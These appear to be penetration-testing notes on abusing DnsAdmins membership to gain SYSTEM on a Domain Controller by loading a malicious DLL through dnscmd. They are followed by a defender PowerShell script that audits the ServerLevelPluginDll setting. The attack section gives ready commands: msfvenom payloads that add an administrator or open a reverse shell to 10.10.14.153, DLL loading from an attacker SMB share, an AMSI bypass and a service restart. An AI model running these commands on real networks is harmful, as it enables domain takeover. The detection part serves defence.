DnsAdmins

DNSAdmin to DC

DnsAdmins group members have access to DNS information on the network. The DNS service runs as NT AUTHORITY\SYSTEM. This can be used to escalate privileges on a DC or other server that is acting as the DNS server for the domain.

The built-in dnscmd utility can set the path of the server-level plugin DLL (the ServerLevelPluginDll setting). Whatever DLL is at that path is loaded by the DNS service, as SYSTEM, the next time the service restarts.

Domain Controllers and DNS

  • In Active Directory environments, Domain Controllers often act as DNS servers.

  • DNS servers are critical to Active Directory operation and are accessible to most domain users.

  • Microsoft implemented a custom DNS management protocol over Remote Procedure Call (RPC) for managing DNS.

The combination of the DNS protocol and the custom management protocol introduces a significant attack surface on Domain Controllers.

How to exploit

Generate a malicious DLL to execute commands

# Add user to group
msfvenom -p windows/x64/exec cmd='net group "Administrators" ryan /add' -f dll -o adduser.dll

# Reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.153 LPORT=443 -f dll -o reverse.dll

Load the custom DLL

dnscmd.exe /config /serverlevelplugindll C:\Users\public\reverse.dll

From the target, run

# From evil-winrm
Bypass-4MSI
dnscmd.exe /config /serverlevelplugindll 'C:\users\ryan\reverse.dll'

# Using smb server
impacket-smbserver share -smb2support .
dnscmd localhost /config /serverlevelplugindll \\10.10.14.153\share\reverse.dll

Finally, stop and start the DNS service so that it loads the DLL.

sc.exe stop dns
sc.exe start dns
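The defender-side check for the procedure above, added here as an example and not part of the original notes: it reviews DnsAdmins membership and reads the ServerLevelPluginDll value that dnscmd /config writes on each DNS server, flagging UNC paths and paths outside System32. It assumes a domain-joined workstation with the ActiveDirectory RSAT module and PowerShell remoting to the servers; the server names in $DnsServers are constructed placeholders.

```powershell
# Assumed context: run as a domain admin from a workstation with the
# ActiveDirectory module; PowerShell remoting enabled on the DNS servers.
$DnsServers = @('dc01.corp.example', 'dc02.corp.example')   # constructed sample names
$RegPath    = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'

# 1. Who can set this value at all: every DnsAdmins member (including nested groups)
#    can point the DNS service at an arbitrary DLL over RPC.
Write-Host '== DnsAdmins members (recursive) =='
Get-ADGroupMember -Identity 'DnsAdmins' -Recursive |
    Select-Object Name, objectClass, distinguishedName |
    Format-Table -AutoSize

# 2. On each DNS server, read ServerLevelPluginDll. In a normal deployment the
#    value is absent; dnscmd /config /serverlevelplugindll leaves it populated.
$Findings = Invoke-Command -ComputerName $DnsServers -ScriptBlock {
    $props  = Get-ItemProperty -Path $using:RegPath -ErrorAction SilentlyContinue
    $dll    = $props.ServerLevelPluginDll
    $status = 'OK: value absent'
    if ($dll) {
        if ($dll -like '\\*') {
            # A UNC path matches the "impacket-smbserver share" pattern above.
            $status = 'ALERT: plugin DLL on a network share'
        } elseif ($dll -notlike "$env:SystemRoot\System32\*") {
            # e.g. C:\Users\public\reverse.dll: a DLL outside System32 is not a
            # legitimate server-level plugin location.
            $status = 'ALERT: plugin DLL outside System32'
        } else {
            $status = 'REVIEW: plugin configured, confirm it is expected and signed'
        }
    }
    [pscustomobject]@{
        Server    = $env:COMPUTERNAME
        PluginDll = $dll
        Status    = $status
    }
}
$Findings | Format-Table Server, PluginDll, Status -AutoSize

# 3. Surface anything that needs action; a flagged value should be cleared and
#    the restart of the DNS service investigated as a possible code-execution event.
$Findings | Where-Object { $_.Status -like 'ALERT*' }
```

Pair this with monitoring for changes to that registry value and for unexpected stop/start of the DNS service on Domain Controllers, since the DLL only runs after the restart shown in the final step.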
